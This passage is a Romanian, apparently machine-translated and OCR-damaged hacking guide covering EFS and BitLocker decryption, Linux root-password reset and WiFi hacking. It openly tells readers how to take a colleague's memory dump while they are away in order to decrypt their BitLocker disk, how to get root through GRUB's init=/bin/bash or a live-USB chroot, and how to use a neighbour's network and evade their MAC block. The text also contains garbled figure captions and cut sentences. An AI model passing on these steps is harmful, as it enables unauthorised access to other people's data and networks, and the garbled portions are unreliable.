fișier Nu există certificat • Schimbați utilizatorul, rulați Advanced EFS Data Recovery Încercați să decriptați fișierul așa cum este arătat mai devreme În primul rând, programul va raporta că certificatul nu a fost găsit Prin urmare, trebuie să accesați fila fișiere legate de EFS și să faceți clic pe butonul Scanare chei După unii [ După un timp, programul va raporta că a găsit cheile, dar probabil nu toate (Fig ) Programul recomandă scanarea cheilor din nou, dar de data aceasta cu opțiunea Scan by sectors activată (Fig ), dar puteți sări peste acest lucru și să mergeți direct la fila Fișiere criptate Programul a găsit și decriptat cu succes fișierul Orez Consola TTS: eliminarea certificatului pentru "Criptarea sistemului de fișiere" Notă Trebuie remarcat faptul că în modul sector cu sector (cu opțiunea Scan by sectors activată), scanarea durează mult mai mult Orez Nu au fost găsite toate cheile alege logica! diskfs) pentru a scana X Pic Activarea opțiunii "Scanare după sectoare" lP Advjnccrt EFS Dau Recovery Tnal Ednon Scanați Qpnons t* Q> ? v" FiaNama £y • • !k Modfc mOM Lota w ce wm&occ Scanfor I ancrypNdUaa | fcoeW SaiMta* Sa db-jh- led jnaaXCla Bavataa "elector Total Mv ( ") Nat t | Advanced EFS Dau Recovery Tnal Edition (c) Э- EkomSolt CaLtd Pic Programul poate decripta fișierul chiar dacă certificatul a fost eliminat Spre rușinea EFS sau spre meritul Advanced EFS Data Recovery, fișierul a fost decriptat în ambele cazuri În același timp, nu aveam nevoie de cunoștințe sau abilități speciale Este suficient să rulați un program care va face toată munca pentru hacker Puteți citi despre cum funcționează programul pe site-ul web al dezvoltatorilor Restabilirea accesului la BitLocker Ca de obicei, înainte de a învăța cum să piratați BitLocker, trebuie să înțelegeți cum funcționează și ce este în general http://www elcomsoft ru/ Caracteristici de implementare BitLocker este o tehnologie de criptare a unităților mai sigură, care a fost integrată în sistemele de operare începând cu Windows Vista Folosind BitLocker, un utilizator poate cripta o partiție de disc (inclusiv cea de sistem, pe care software-ul terță parte nu este întotdeauna capabil să o facă), un disc întreg, un disc amovibil (de exemplu, o unitate flash USB) BitLocker a fost răspunsul Microsoft la un număr tot mai mare de atacuri offline care au fost deosebit de ușor de efectuat pe computerele Windows Oricine are o unitate flash bootabilă se poate simți ca un hacker Pur și simplu va opri cel mai apropiat computer și apoi îl va porni din nou - deja cu propriul sistem de operare și un set portabil de utilitare pentru găsirea parolelor (pe care am menționat mai devreme), datele confidențiale și disecția sistemului În același timp, nu trebuie să introducă nicio parolă în cont, pur și simplu își va porni sistemul de operare și va citi datele Dacă doriți, la sfârșitul zilei de lucru, puteți elimina complet hard disk-ul, puteți copia toate informațiile de pe acesta și apoi returnați totul așa cum era Și utilizatorul nici măcar nu va ști că cineva a "scăpat" toate fișierele de pe computerul său Tehnologia BitLocker vă permite să criptați datele de pe un disc sector cu sector Chiar dacă cineva pornește cu sistemul de operare sau scoate discul din computer, nu va putea citi nimic, deoarece datele sunt criptate BitLocker vă permite să lucrați cu o unitate criptată în același mod ca și cu oricare alta, doar că mai întâi va trebui să introduceți o parolă pentru a accesa unitatea Este posibil să întâmpinați și o scădere a performanței cu - %, dar efectul va fi vizibil doar pe computerele slabe În general, este posibil ca utilizatorul să nu observe o scădere a performanței, totul depinde de ce date sunt stocate pe disc Dacă, să zicem, unitatea D: a fost criptată, pe care sunt stocate atât datele, cât și programele, atunci scăderea performanței va fi vizibilă, mai ales la lansarea programelor (tacem deja despre criptarea unității de sistem C:) Dacă doar documentele sunt stocate pe unitatea D: și programele sunt stocate pe unitatea C:, atunci utilizatorul nu ar trebui să experimenteze nicio degradare a performanței atunci când lucrează cu un disc criptat În ceea ce privește restabilirea accesului, BitLocker este mult mai convenabil decât EFS Deși EFS oferă conceptul de agenți de recuperare, procedura de recuperare în sine este destul de complexă și nu toți utilizatorii începători pot a face cu ea Se pare că intrarea în EFS costă o rublă, iar ieșirea - Utilizatorii pot cripta rapid și ușor datele, dar puțini oameni știu ce să facă pentru a le decripta în caz de urgență În cazul BitLocker, totul este mult mai simplu Când criptează o unitate, utilizatorul specifică o parolă, iar BitLocker generează o cheie de recuperare care poate fi utilizată cu ușurință pentru a restabili accesul în cazul în care parola este uitată Cheia de recuperare poate fi stocată pe computer, pe cipul TPM (dacă este acceptat de computer) și într-un cont Microsoft (nu este recomandat, deoarece acestea oferă în esență acces la datele secrete ale Microsoft) Containerele cripto BitLocker sunt destul de sigure singure Dacă cineva vă aduce de nicăieri o unitate flash criptată de BitLocker, este puțin probabil să o puteți decripta într-un timp rezonabil Poate că va fi, dar până atunci vei fi bătrân, iar informațiile își vor pierde orice relevanță Cea mai periculoasă este cheia de recuperare Adesea, utilizatorii criptează unitatea, dar nu acordă nicio atenție stocării în siguranță a cheilor de recuperare Hackerul poate elimina hard disk-ul sau boot-ul de pe o unitate flash bootabilă El fișierele au fost căutate după numele "Recovery Key*" și/sau după conținutul "Recovery Key" El va găsi cheia de recuperare și apoi este o chestiune de tehnologie S-ar părea că nu există plângeri despre BitLocker, acesta este un factor uman Dar, de fapt, utilizatorului nu ar trebui să-i pese cum au fost decriptate datele tale - fie prin găsirea unei vulnerabilități în BitLocker, fie pentru că nu a protejat bine cheia de recuperare Principalul lucru este că cineva a putut avea acces la informații clasificate și acesta este cel mai rău Pe acest fapt se va baza strategia noastră ulterioară - pe căutarea unei chei de recuperare, care se află probabil pe același computer cu discul criptat Detalii tehnice Prima dată când activați BitLocker, trebuie să așteptați mult timp Acest lucru este destul de de înțeles - procesul de criptare sector cu sector poate dura câteva ore, deoarece nu este posibil să citiți mai rapid toate blocurile de HDD-uri terabyte Dar dezactivarea BitLocker are loc aproape instantaneu - cum de? Faptul este că atunci când BitLocker este dezactivat, nu decriptează datele Toate sectoarele vor rămâne criptate cu cheia FVEK Pur și simplu, accesul la această cheie nu va mai fi limitat în niciun fel Toate verificările vor fi dezactivate, iar VMK-ul va rămâne înregistrat printre metadatele text clar De fiecare dată când computerul este pornit, încărcătorul sistemului de operare va citi VMK (fără a verifica TRM-ul, a solicita o cheie pe o unitate flash sau o parolă), decriptând automat FVEK-ul cu acesta și apoi toate fișierele pe măsură ce sunt accesate Pentru utilizator, totul va arăta ca o lipsă completă de criptare, dar cei mai atenți pot observa o ușoară scădere a performanței Mai precis - lipsa unei creșteri a vitezei după dezactivarea criptării Mai este ceva interesant în această schemă În ciuda numelui (tehnologia de criptare a discului complet), unele dintre date atunci când utilizați BitLocker rămân încă necriptate MBR și BS rămân în formă deschisă (cu excepția cazului în care discul a fost inițializat în GPT), sectoarele și metadatele proaste Un bootloader deschis oferă spațiu imaginației Sectoarele pseudo-defectuoase sunt convenabile pentru a ascunde rootkit-urile și alte programe rău intenționate, iar metadatele conțin o mulțime de lucruri interesante, inclusiv copii ale cheilor Dacă BitLocker este activ, atunci acestea vor fi criptate (dar mai slab decât FVEK criptează conținutul sectoarelor), iar dacă sunt dezactivate, vor rămâne pur și simplu în clar Aceștia sunt toți vectori potențiali de atac Sunt potențiale pentru că, pe lângă ele, există altele mult mai simple și mai universale - aceeași căutare a unei chei de recuperare, care a fost deja menționată Următoarele vă vor arăta cum să activați BitLocker și cum să restabiliți accesul la o unitate criptată dacă uitați parola Vom cripta unitatea E:, pe care vom plasa apoi toate documentele secrete Dacă aveți un singur disc, îl puteți partiționa în partiții cu AOMEI Partition Assistant sau orice alt program similar Activarea criptării și a recuperării accesului cu o cheie de recuperare Pentru a activa criptarea BitLocker, urmați acești pași: Deschideți panoul de control clasic și accesați secțiunea Criptare Unitatea BitLocker (Figura ) Faceți clic pe linkul Activați BitLocker de lângă unitatea pe care doriți să o criptați G În fereastra care apare (Fig ), activați Utilizare parola pentru a debloca discul și introduceți parola și confirmarea acesteia Faceți clic pe butonul Următorul Alegeți unde să salvați cheia de recuperare (Fig ) Salvați-l în dosar (Fig ) Faceți clic pe Următorul Alegeți ce să criptați (Fig ) - întregul disc sau doar spațiul ocupat Criptarea numai pentru spațiul folosit este mai rapidă și potrivită pentru computere și unități noi Dacă tocmai a fost creată o nouă partiție prin împărțirea unei părți din unitatea C:, puteți alege această opțiune Dacă trebuie să criptați un disc care a fost folosit de mult timp, selectați Criptați întregul disc - acest lucru este mai fiabil, dar va trebui să așteptați, uneori câteva ore Selectați modul de criptare Începând cu versiunea Windows , BitLocker utilizează un nou mod de criptare a unității și trebuie să îl selectați (Fig ) Nu este nevoie să vă concentrați pe computerele vechi Ca ultimă soluție, dacă trebuie să lucrați cu un disc criptat pe un sistem vechi, actualizați sistemul - este de mult așteptat să faceți acest lucru, având în vedere că este build Faceți clic pe butonul Start criptare (Fig ) În funcție de modul de criptare selectat și de dimensiunea discului, poate fi necesar să așteptați Așteptați mesajul Criptare finalizată și faceți clic pe OK Panoul de control va arăta că BitLocker este activat pentru cei selectați discul piciorului (Fig ) - - ' IMCH ІІІІ-■ Orez Criptarea unității BitLocker [ SHIIIIIIIIIIII I Next ~] Anulează Orez Activați criptarea Cum îți arhivezi cheia? Despre Parametrii neobișnuiți sunt controlați de emtein administrator Dacă ați uitat parola sau ați pierdut cardul inteligent, puteți utiliza opțiunea de recuperare pentru a accesa unitatea ■ "♦ Salvați în contul dvs Microsoft Salvați în fișier -> Imprimați cheia de recuperare Orez Unde să salvezi cheia de recuperare Orez Salvarea unei chei într-un fișier G k Specificați ce parte a Drive-ului pe care doriți să o criptați Dacă configurați VLIoLet pe un nou DNS sau PC trebuie doar să criptați acea parte a discului care este utilizat în prezent de BaLorter ash" Mod nou de criptare (luat*pentru unitățile neamovibile de pe acest dispozitiv) О Modul compatibil (optim pentru discurile care pot fi amestecate de pe această unitate) Orez Modul de criptare a discului ^calcul de "ifrpeli • I Omena Orez Faceți clic pe butonul "Porniți criptarea" □G (ȘI "de "nm > Greutate mgyekіy pane yupmmeni* > Cod" yyuyVdІdeYg "Umm exercițiul i - dsmmmm oriiish C!lfroya * ne disc * Ehtlochei Disk aperasm "al-lea sistem Cu Vn Iosii otshismen Unități de date fixe Stocare detașabilă - BrtLocker That Go Volum nou (£ •) WGloske inclus Orez Bitlocker activat Acum să facem ceva ce % dintre utilizatori nu fac Deschideți fișierul cu cheia de criptare În mod implicit, arată ca cel prezentat în Fig Orez cheie de recuperare Ștergeți tot ce nu are legătură cu cheia de recuperare din fișier Dacă aveți mai multe discuri criptate, va trebui să lăsați și identificatorul discului, astfel încât să înțelegeți ce disc îi aparține o anumită cheie de recuperare Dar dacă există un singur disc criptat, atunci puteți șterge totul în siguranță, cu excepția cheii în sine (Fig ) Înainte de a salva fișierul, ștergeți atributul Numai citire, altfel nu veți putea salva fișierul Fișierul în sine este mai bun G ? plasați pe suporturi amovibile, care vă vor fi mereu alături Puteți să o scrieți, de exemplu, în sistemul de fișiere al telefonului dvs - ca una dintre opțiunile de a ascunde cheia de recuperare SM "o * a SDOT Zsh Sg-rmi H U) • IV -I*v "- "M PE - b M -M"EM- " Gpl ort" ZOT WwMwttCRlP UTM i£ Orez Ștergeți tot ce nu este necesar, ceea ce vă va permite să identificați fișierul ca fișier cheie de recuperare Acum discul este deblocat și puteți lucra cu el ca de obicei La următoarea pornire, va trebui să deblocați accesul la disc - introduceți parola specificată la criptarea discului și faceți clic pe butonul Deblocare (Fig ) Dacă v-ați uitat parola, utilizați linkul Introduceți cheia de recuperare pentru a introduce cheia de recuperare Orez Deblocarea accesului la disc Uită-te la fig Panoul de control are capacitatea de a arhiva cheia de recuperare (dacă ați șters accidental fișierul cu cheia militară) formarea), precum și să activeze deblocarea automată a unității la conectare În acest caz, nu trebuie să introduceți o parolă după fiecare repornire, dar dacă altcineva lucrează la computer, este mai bine să nu utilizați această funcție În ciuda faptului că unitatea va fi deblocată automat, datele de pe unitate vor fi criptate, ceea ce va ajuta la contracararea unui atac offline Opțiuni suplimentare BitLocker Hack BitLocker este un sistem grozav care reprezintă un compromis între fiabilitate, viteză și comoditate De fapt, este mai avansat decât EFS și este recomandat să-l folosești în loc de EFS, în ciuda faptului că trebuie să criptezi o întreagă partiție de disc, și nu doar un folder Desigur, dacă nu doriți să împărțiți discul în partiții și nu doriți să criptați discul de sistem, atunci va trebui să utilizați fie EFS, fie containere cripto, dar acum nu este vorba despre asta Să aruncăm o privire la modalități suplimentare de a obține acces neautorizat la un disc Remarcăm imediat că în această secțiune nu vom lua în considerare recomandări privind manipulările cu fișierul cheie de recuperare Acest lucru a fost menționat mai devreme Acesta este într-adevăr cel mai simplu mod de a accesa o unitate criptată După cum sa menționat, BitLocker este un compromis Și orice compromis slăbește întregul sistem, indiferent de algoritmii puternici pe care se bazează Este mai ușor să piratați nu AES, ci să găsiți o vulnerabilitate direct în implementarea sistemului în sine Trebuie să căutați fie o vulnerabilitate, fie specificul implementării În cazul BitLocker, această specificitate este suficientă - în mod implicit, copiile cheilor BitLocker sunt trimise către SkyDrive și păstrate în Active Directory Pentru ce? În cazul în care vă pierdeți parola, pentru a vă putea recupera datele De aceea, nu trebuie să salvați cheile într-un cont Microsoft - acest lucru s-a spus De asemenea, nu trebuie să utilizați un cont Microsoft pentru a cripta partiția Este mai bine să creați un cont local, să vă conectați sub acesta și să criptați unitatea, în timp ce veți avea ocazia să refuzați să publicați cheia pentru SkyDrive Acum să vorbim despre întreprindere Parola de recuperare este o combinație de de biți și/sau de biți care este generată în timpul criptării unității BitLocker Când sunt puține computere, este ușor să țineți evidența cheilor și a parolelor, dar dacă numărul ajunge la sute, sarcina este foarte complicată Gia există Politicile de grup vă permit să configurați BitLocker pentru a stoca copii de rezervă ale cheilor și parolelor de recuperare în obiectul computerului Active Directory Fiecare obiect de recuperare BitLocker are un nume unic și conține un identificator unic la nivel global pentru parola de recuperare și, opțional, un pachet care conține cheia Dacă sunt stocate mai multe parole de recuperare pentru același obiect computer în AD DS, numele obiectului de date va include data la care a fost creată parola Numele elementului de recuperare BitLocker este limitat la de caractere, așa că ar trebui să permiteți inițial o parolă de de biți Caracteristica de stocare a datelor de recuperare BitLocker se bazează pe o extensie de schemă Active Directory care generează atribute suplimentare Începând cu Windows Server , extensia este instalată în mod implicit, deși încă era necesară o configurație suplimentară pentru lucrări ulterioare Schema optimă este Windows Server și o versiune superioară, în care totul funcționează de la cutie Același lucru este valabil și pentru următoarea versiune de Windows Server / , care nu are modificări aici Pentru a gestiona stocarea cheilor de recuperare, accesați secțiunea Configurare computer Politici, Șabloane administrative, Componente Windows, BitLocker Drive Protection Trebuie să verificați starea informațiilor de recuperare a stocării din politica AD DS Dacă nu doriți ca cheile de recuperare BitLocker să fie stocate în Active Directory, trebuie să dezactivați această politică Dar, deoarece este activat implicit, acum știți că având acces la un controler de domeniu (poate sunteți administrator de rețea), puteți accesa discul criptat al oricărui utilizator de domeniu Principala modalitate de a deschide BitLocker este să obțineți o cheie de recuperare După cum știm, poate fi obținut dintr-un fișier cheie stocat în mod nesigur, dintr-un cont Microsoft și din Active Directory Dacă sunteți interesat de cealaltă față a monedei, și anume protecția unui disc criptat, urmați aceste recomandări simple: • Păstrați fișierul cu cheia de recuperare într-un loc sigur Un computer cu un disc criptat nu este un astfel de loc • Nu utilizați un cont Microsoft când criptarea este activată, nu salvați cheia de recuperare în cont • Nu stocați cheia de recuperare în AD Fără a avea privilegii administrative la nivel de domeniu, acest lucru va fi dificil de realizat În plus, cheile de criptare sunt stocate în RAM - altfel nu ar exista o criptare transparentă Aceasta înseamnă că sunt disponibile în fișierul ei de descărcare și hibernare BitLocker a fost conceput pentru a proteja numai împotriva atacurilor offline Ele sunt întotdeauna însoțite de o repornire și conectarea discului la un alt sistem de operare, ceea ce duce la ștergerea memoriei RAM Cu toate acestea, în setările implicite, sistemul de operare aruncă memoria RAM atunci când apare o defecțiune (care poate fi provocată) și își scrie tot conținutul în fișierul de hibernare de fiecare dată când computerul intră în somn profund Prin urmare, dacă v-ați conectat recent la Windows cu BitLocker activat, există șanse mari să obțineți o copie decriptată a cheii VMK și să o utilizați pentru a decripta FVEK și apoi datele în sine de-a lungul lanțului Există un software special pentru a decripta o unitate BitLocker, dar pe lângă unitatea în sine, trebuie să trimiteți și un dump de memorie la "intrarea" acestui software Obținerea unui dump de memorie este destul de simplă - folosind programe speciale precum RAM Capture Trebuie să spargeți BitLocker-ul unui coleg? Așteptați până când se îndepărtează de computer fără a-l bloca Până la activarea screensaver-ului, rulați RAM Capture de pe unitatea flash și salvați imaginea de memorie pe unitatea flash Calculatoarele moderne sunt echipate cu - GB de RAM, iar unitățile flash moderne au depășit de mult GB Deci, există suficient spațiu și, având în vedere USB , crearea și scrierea unui dump nu va dura mult timp Ca ultimă soluție, puteți ascunde descărcarea pe unitatea necriptată a unui coleg, de exemplu, creați un folder C:\tmp și plasați descărcarea acolo Seara, când un coleg se duce acasă, tot ce trebuie să faci este să-i scoți hard diskul și să introduci partiția criptată cu BitLocker și depozitarea memoriei în același program Urmează o chestiune de tehnologie Programul va găsi cheile necesare în depozitul de memorie și va decripta discul Programul se numește Passware și la https://www forensicfocus com/articles/how-to-decrypt-bitlocker-volumes-with-passware/ puteți găsi instrucțiuni detaliate despre cum să "recuperați" accesul la disc Teoretic, nu poți face o groază Cert este că computerele moderne care rulează Windows nu se opresc, ci intră în hibernare Acesta este momentul în care conținutul RAM este șters pe disc și apoi - la pornire - restaurat înapoi în RAM Deci, pentru a securiza BitLocker, trebuie să închidem două posibile găuri de securitate Trebuie să eliminăm situația când cineva ajunge în spatele computerului în timp ce tu ești plecat și să dezactivăm hibernarea Windows Pentru a implementa primul punct, trebuie să vă obișnuiți să vă blocați întotdeauna contul atunci când părăsiți computerul De asemenea, trebuie să setați eu J interval mic de economizor de ecran ( - minute) Da, va deveni mai puțin confortabil la lucru, pentru că după minute de inactivitate va trebui să introduceți din nou parola, dar va fi mai sigur Dacă doriți, puteți reduce intervalul la minut Și pentru a dezactiva hibernarea în Windows , deschideți un prompt de comandă cu privilegii de administrator* și introduceți comanda: powercfg -h oprit Acest lucru va dezactiva acest mod, va elimina fișierul hiberfiLsys de pe hard disk și, de asemenea, va dezactiva opțiunea de pornire rapidă a Windows (care folosește și această tehnologie și nu funcționează fără hibernare) Ca urmare, se vor întâmpla următoarele: • Nimeni nu va putea folosi fișierul hiberfil sys pentru a obține acces la unitatea BitLocker - asta e bine • Mărimea fișierului de hibernare este egală cu dimensiunea memoriei RAM Dezactivând hibernarea, veți economisi aceeași cantitate de spațiu pe disc (dacă aveți GB de RAM, veți primi încă GB) - și acest lucru este bine • Windows va începe să se încarce mai lent - acest lucru este rău Tehnologia de criptare completă a discurilor BitLocker diferă între versiunile de Windows Odată configurat corespunzător, vă permite să creați discuri criptate care sunt teoretic comparabile ca putere cu TrueCrypt sau PGP spargerea parolei rădăcină Linux Și acum vom încerca să spargem cel mai sigur sistem de operare - Linux Vom arăta acum cât de ușor este să obțineți parola utilizatorului root, utilizatorul cu drepturi maxime în Linux Odată ce obțineți drepturile de root, puteți face tot ce doriți cu sistemul Există două moduri de a obține cu ușurință accesul root Primul este cel mai simplu și va dura câteva minute pentru a fi implementat, al doilea este puțin mai complicat și va veni la îndemână dacă administratorul a schimbat setările bootloader-ului GRUB Deci, să ne uităm mai întâi la metoda : Reporniți computerul Fie comanda de repornire este potrivită pentru aceasta (în multe distribuții, poate fi introdusă nu numai de administratori, ci și de I K ; utilizatori obișnuiți), sau o comandă similară selectată din meniul GUI sau apăsând butonul Reset de pe carcasa computerului Când reporniți computerul, veți vedea meniul bootloader GRUB - acesta este sistemul de operare Noul bootloader Linux care a devenit standardul de facto Probabilitatea de a întâlni un alt încărcător este practic În fig Figura prezintă meniul de pornire pentru distribuția Fedora Evidențiați primul element și apăsați butonul e pentru a edita parametrii miezuri Va apărea un editor de text simplu în care trebuie să găsiți linia care începe cu cuvântul linux Conține parametrii trecuți nucleului Linux Adăugați init=/bin/bash la sfârșitul acestei linii, așa cum se arată în Figura Apăsați Ctrl + X pentru a porni cu opțiunile de kernel modificate Așteptați ca sistemul să pornească și veți vedea promptul de comandă- linie nouă, începând cu simbolul # - aceasta indică faptul că ați primit drepturi de root și acum puteți face totul cu sistemul pe care îl aveți Orez Meniul de pornire Totul va dura câteva minute, cea mai mare parte a timpului va fi petrecut repornind sistemul Acum metoda Va funcționa dacă administratorul a fost prudent și a setat o parolă pentru a schimba parametrii bootloader-ului GRUB În acest caz, nu vei primi nimic A doua metodă va fi similară cu hacking-ul Windows - veți avea nevoie de un DVD bootabil sau o unitate USB Descărcați de pe site-ul oficial Ubuntu (puteți folosi orice altă distribuție), creați un USB bootabil disc cu Rufus și porniți de pe acea unitate flash După descărcare, selectați comanda Ubuntu Ubuntu (Fig ) lu p li nu Ițrant i'AtJ imit ' )J fc TJ D ruotuil ID 'HMSi b nHYG-"ig P a' b'iHde-i-ro rootf I Tsl ub i rcrtrt rhgh q"> iot i"it biwzbo- hw tuitrd Ornai i initranf fc IJ xBb b imd Pr**s Ctrl * t "i tur' Ctrl " hir a UI Syt"" T/n CMtntnuM/ppttnal, M* tytet / •!" byv- M>k " "ta Sh TSMN "de" MM SM "actora O'U wa "î Vtrt" l ( Unii* cctțw* de X * Sil " UI US "'M (Uft! '/pfeHUal): aytrt Ml ID> stce (frtnluwvoattr t N b "t-\u e * "*•"> Pic Montarea hard disk-ului victimei Să ne uităm la conținutul directorului /rootfs Fișierele de care avem nevoie, și anume întregul sistem de fișiere rădăcină, se află în directorul /rootfs/root Și acum începem să violăm sistemul Introduceți comenzi: sudo chroot /rootfs/root sudo passwd root Introduceți o nouă parolă UNIX: [opțiuni] unde min și max sunt numere Consultați pagina de manual pentru instrucțiuni și exemple despre cum să utilizați Crunch Să generăm un dicționar care să conțină cuvinte cu lungimea minimă și maximă de caractere ( ), adică dicționarul va conține doar parole de caractere Parolele vor conține doar abcdef caractere, rezultatul va fi salvat în fișierul chars txt: root@kali:-# crunch abcdef -o chars txt Crunch va genera acum următoarea cantitate de date: octeți MB GB TV PB Crunch va genera acum următorul număr de linii: Mai multe informații despre crunch pot fi găsite la https://tools kali org/password-attacks/crunch Capitolul Hacking routerul WiFi al unui vecin Motive pentru hacking De ce trebuie să spargi routerul vecinului tău? Motivele fiecăruia sunt diferite Luați în considerare cele mai comune: Academic - hacking de dragul hacking-ului, doar pentru a învăța cum să folosești software specific TVA Un obiectiv foarte lăudabil și aproape nobil Economii - de ce să plătești pentru internet când poți folosi vecin? Mascare - de foarte multe ori WiFi-ul este piratat pentru a "nu străluci" Am condus până la un loc în care rețeaua fără fir a cuiva "prinde", a spart-o și folosești internetul - nici măcar nu ai nevoie de un VPN Dacă o fac, clar că nu este pentru tine Dar pentru acest hack, routerul vecinului nu este potrivit, vă puteți da seama Dar o rețea fără fir într-un fel de centru comercial sau de birouri este chiar problema Totuși, principalul motiv pentru a pirata o rețea WiFi este economisirea banilor Moda pentru hacking WiFi a fost la apogeu acum - ani, când au fost îndeplinite două condiții: costul ridicat al internetului și lipsa de scurgere a criptării WEP/WPA Costul ridicat al accesului i-a forțat pe hackeri să caute modalități de a economisi bani Unul dintre ei căuta victime cu porturi SMB deschise în rețeaua ISP-ului Schema a fost următoarea: toată lumea s-a conectat fără routere direct la rețeaua furnizorului, de exemplu, printr-o conexiune prin modem Hackerul a găsit sisteme cu porturi SMB deschise și, folosind vulnerabilitatea, a ajuns la sistemul de fișiere al victimei Era interesat de fișierele pwd care conțineau parole de conexiune PPP criptate Apoi, folosind un utilitar special, acest fișier a fost decriptat și hackerul a avut un nume de utilizator și o parolă pentru a intra în rețeaua furnizorului A întrerupt conexiunea, s-a reconectat cu numele de utilizator și parola specificate și a obținut acces la Internet Schema a fost populară cu mult timp în urmă - în zilele Windows Sistemul în sine era foarte scurs, de regulă, nu era instalat un firewall și nimeni nu folosea routere pentru a accesa Internetul Toate acestea au fost motivul hacking-ului relativ ușor al internetului Acum această metodă nu va funcționa În primul rând, toată lumea se conectează acum prin routere WiFi, care închid toate porturile pentru conexiunile de intrare din exterior, cu excepția celor necesare pentru a răspunde unei cereri din exterior Cu alte cuvinte, chiar dacă există pe undeva un Windows nepatchat, tot nu îl veți găsi, deoarece este protejat în mod fiabil de firewall-ul routerului În al doilea rând, versiunile moderne de Windows au fost mult timp tratate pentru greșelile copiilor, iar securitatea, dacă nu a fost dezactivată, este la nivel - un firewall obișnuit și un antivirus sunt destul de bune A doua schemă populară pentru obținerea accesului gratuit la Internet este piratarea unei rețele WiFi Anterior (cu mult timp în urmă, în anii ) au folosit protocolul WEP, care era plin de găuri ca o sită și chiar a durat foarte puțin timp pentru a sparge WiFi Dar apoi a fost înlocuit (în ) de protocolul WPA, care folosește criptarea Hackingul a devenit mult mai dificil Dar totuși, multe rețele WiFi la modă veche (cineva a cumpărat un router vechi care nu suporta WPA, cineva nu știa ce este WPA etc ) foloseau protocolul WEP Prin urmare, în - , probabilitatea de a întâlni o rețea WEP era încă mare Ceea ce a dat naștere la o mulțime de materiale precum "Cum să piratați WiFi în minute" În cazul WEP, da, poate fi spart în minute Cu WPA, totul este mai complicat, deoarece traficul este criptat Dar cu WPA totul este mult mai complicat Primele dispozitive care suportă WPA au început să apară în , dar până în se poate spune cu certitudine că nu a fost folosit foarte des În primul rând, nu toate routerele WPA vechi au fost vândute în Aceste modele au fost vândute și în și Un utilizator care implementează o rețea WiFi ar putea pur și simplu să cumpere un dispozitiv vechi În al doilea rând, nu toate adaptoarele wireless au suportat WPA Dacă a existat cel puțin un dispozitiv în rețea care nu acceptă WPA , atunci acest protocol, de regulă, a fost dezactivat și a fost utilizat WPA Până în , putem spune cu încredere că toate rețelele WiFi folosesc protocolul WPA - până atunci toată lumea a reușit să actualizeze routerele (care, de regulă, nu trăiesc mai mult de ani) și adaptoarele de rețea Prin urmare, piratarea WiFi a devenit mult mai complicată Dar până acum Internetul a scăzut în preț Și nu mai există o nevoie specială de a pirata rețeaua WiFi Este clar că cineva va sparge WiFi pentru a încerca chiar materialul "Cum să piratezi WiFi în minute", cineva - pentru a obține adresa IP a altcuiva, dar totuși atacuri masive asupra rețelelor WiFi, așa cum a fost, să zicem -Acum ani, nu mai Înainte de a sparge routerul cuiva, vom acoperi două piese interesante de material Ele nu sunt direct legate de hacking, dar, ca utilizator avansat, trebuie doar să știți despre asta În primul rând, vom încerca să ne amintim propria parolă salvată în Windows Se întâmplă ca rețeaua să fie configurată și parola să fie uitată Și când devine necesar să conectați un nou dispozitiv wireless, va trebui să setați o nouă parolă pe toate dispozitivele, ceea ce este incomod Prin urmare, este mai ușor pe un computer care rulează " J de Windows, spionați parola utilizată și nu reconfigurați routerul Al doilea truc este să vă schimbați adresa MAC Se întâmplă să folosești internetul vecinului, pe care l-ai spart pentru a economisi bani, dar vecinul și-a dat seama de un dispozitiv necunoscut în rețeaua lui și l-a blocat Pentru a obține din nou acces, trebuie să vă schimbați adresa MAC (adresa hardware a adaptorului de rețea), altfel routerul vecinului vă va bloca chiar dacă parola este corectă Aflați-vă parola WiFi Următorii pași vă vor permite să vizualizați parola pentru rețeaua WiFi la care sunteți conectat: Faceți clic dreapta pe pictograma de conexiune din zona de notificare și selectați Deschideți "Setări de rețea și Internet" Derulați prin fereastra care se deschide până când vedeți linkul Centrul de control crearea de rețele și partajare Va apărea o fereastră binecunoscută (din versiunile anterioare de Windows) Centrul de rețea și partajare Selectați comanda Schimbați setările adaptorului din panoul din stânga În fereastra care apare, faceți dublu clic pe adaptorul pe care îl utilizați pentru conexiune wireless Se va deschide fereastra Stare - Rețea fără fir Apropo, pe fereastra asta puteți identifica din neatenție probleme cu rețeaua dvs fără fir Pe fig Figura - arată că conexiunea a funcționat doar de de minute, dar conexiunea a funcționat de fapt de la : am - aproximativ : la momentul scrierii acestui articol Faceţi clic pe butonul Proprietăţi wireless În fereastra care apare (Fig ) accesați fila Securitate și activați caseta de selectare Afișare caractere introduse Veți vedea parola pentru rețeaua wireless actuală Schimbați adresa MAC Adresa MAC este adresa hardware a adaptorului de rețea, inclusiv adaptorul WiFi Secvența de acțiuni pentru schimbarea adresei MAC este următoarea actual: GOIMІІІІІНІІІНІIIIІІІІ Panou de control - Pagina de pornire Vizualizați informațiile de bază ale rețelei și configurați conexiunile Vizualizați rețelele active Schimbă setările adaptorului Schimbați opțiunile avansate de partajare Opțiuni de transfer media Lotomy Tip de acces: Conexiuni ' Internet arf Rețea fără fir tgipChaik" Modificarea setărilor de rețea Crearea și configurarea unei noi conexiuni de rețea yall Configurați o conexiune în bandă largă, dial-up sau VPN sau configurați un router sau un punct de acces ** Depanare Diagnosticarea și remedierea problemelor de rețea sau întrebarea/verificarea dacă problema a fost rezolvată Braiymauer al fundașului Wmdonvs comunicare în infraroșu Proprietăți browser Orez Centrul de rețea și partajare ai Stare - Rețea wireless x Conexiunea I conexiune: Internet Conexiune FV : Fără acces la rețea Starea mediului; Conectat SSJD: durată; : : Viteza: , Mbps Calitatea semnalului: Detalii Proprietățile rețelei wireless ACTIVITATE Sent • - Pr• **yato buc I ^Proprietăți ^Spituchit Diagnostics ivkrl Orez Parola "recuperată" Orez Stare - Wireless • Lansați Manager dispozitive Dacă doriți să o faceți rapid, apăsați pe Win + R și rulați comanda devmgmt msc • Găsiți adaptorul de rețea în lista de dispozitive și faceți dublu clic pe el Va fi în grupul Adaptoare de rețea • În fereastra de proprietăți a adaptorului, selectați fila Avansat și găsiți elementul Adresă de rețea (sau Adresă de rețea) și setați o nouă valoare l Pentru ca modificările să aibă efect, trebuie fie să reporniți computerul, fie să dezactivați și să activați adaptorul de rețea Adresa MAC este formată din cifre ale sistemului I -ary și trebuie setată fără a utiliza două puncte și alte semne de punctuație Proprietăți: Realtek PCIe G E Family Controller X Resurse generale complementare pentru evenimentele de organizare a șoferilor HHM sunt listate proprietățile acestui adaptor, selectați proprietatea pe care doriți să o modificați in dreapta - sensul acestei bolti rea C Niciuna Orez schimbarea adresei MAC Notă Primele două cifre ale adresei MAC specificate nu trebuie să înceapă cu , dar ar trebui să se 